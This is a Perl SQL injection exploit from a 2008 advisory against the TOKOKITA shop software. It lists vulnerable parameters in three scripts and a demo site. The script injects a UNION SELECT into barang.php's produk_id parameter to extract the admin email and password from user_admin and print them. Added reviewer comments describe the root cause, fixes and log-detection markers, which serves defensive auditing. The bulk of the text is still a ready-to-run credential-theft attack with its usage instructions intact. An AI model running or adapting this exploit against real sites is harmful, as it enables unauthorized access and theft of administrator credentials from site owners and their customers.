
tokokita-sql.txt

Posted on 26 June 2008

#!/usr/bin/perl
# k1tk4t Public Security Advisory
# ////////////////////////////////////////////////////////////
# TOKOKITA Multiple Remote SQL Injection
# Demosite : http://www.tokokita.net/toko/
# Vendor   : http://www.tokokita.com/
# Bugs     : 1. catlist.php?cat_id=[Blind SQLi]
#            2. catlist_detail.php?cat_id=[Blind SQLi]
#            3. barang.php?produk_id=[SQLi]
# Thanks to:
#   str0ke,DNX,n0c0py,L41n,
#   NTOS-Team->[fl3xu5,opt1lc,sakitjiwa],
#   eCHo->[y3dips,K-159,lirva32, and the other staff]
#
# Reviewer notes, for anyone auditing or defending an installation:
#   * What the script does: it sends a single GET request to barang.php
#     with a UNION SELECT appended to produk_id, then searches the returned
#     page for two marked values (the email and password columns of the
#     user_admin table).
#   * Root cause (inferred -- the PHP source is not shown on this page):
#     the produk_id and cat_id parameters listed above presumably reach a
#     SQL statement without being cast to an integer or bound as parameters.
#   * Application-side fix: bind the ids as query parameters, or reject any
#     value that is not an unsigned integer, in all three scripts. If admin
#     passwords are not already stored as salted, slow hashes, do that too,
#     so a leaked column is not directly usable.
#   * Detection: in web-server logs, requests to barang.php, catlist.php or
#     catlist_detail.php whose id parameter is not purely numeric; this
#     request carries "union", "concat(0x", "user_admin" and a trailing
#     "/*". In responses, the literal markers k1t...1n and k4t...0ut.
#   * NOTE(review): the script runs without "use strict" / "use warnings".

use LWP::UserAgent;

# Usage banner. The strings are kept exactly as published
# (Indonesian: "Penggunaan" = usage, "Contoh" = example).
my $rule = " //////////////////////////////////////////////////////////////////";
my @usage = (
    $rule,
    " // ..::> k1tk4t <::.. //",
    " // TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit //",
    $rule,
    " [!] ",
    " [!] Penggunaan : perl tokokita.pl [Site] [Path]",
    " [!] Contoh : perl tokokita.pl localhost /toko/",
    " [!] ",
    " ",
);

# The banner is shown whenever the second argument is missing or false.
unless ( $ARGV[1] ) {
    print for @usage;
    exit;
}

my ( $host, $base ) = @ARGV[ 0, 1 ];

# Query-string payload, reproduced byte-for-byte from the advisory.
# The hex literals are the delimiters the two regexes below look for:
# 0x6b3174 = "k1t", 0x316e = "1n", 0x6b3474 = "k4t", 0x307574 = "0ut".
my $union = "union+ select+ null, null, null, concat(0x6b3174,email,0x316e), null, concat(0x6b3474,password,0x307574), null, null, null, null, null+ from+ user_admin/*";

my $url = join '', "http://", $host, $base, "barang.php?produk_id=-9+", $union;

my $ua = LWP::UserAgent->new;
print " [!] Injeksi SQL ";    # "Injeksi SQL" = SQL injection

# get() returns a response object even for HTTP errors, so the "or" branch
# is not expected to run; err() is not defined anywhere in this script.
my $response = $ua->get($url) or err();
my $page     = $response->content;

if ( $page =~ /k1t(.*?)1n/ ) {
    print " [+] Username : $1";

    # The result of the second match is not checked; if it fails, $1 still
    # holds the capture from the first match when the next line prints it.
    $page =~ /k4t(.*?)0ut/;
    print " [+] Password : $1";
    print " ";
}
else {
    print " [-] Exploit gagal ;)";    # "gagal" = failed
    exit();
}

 
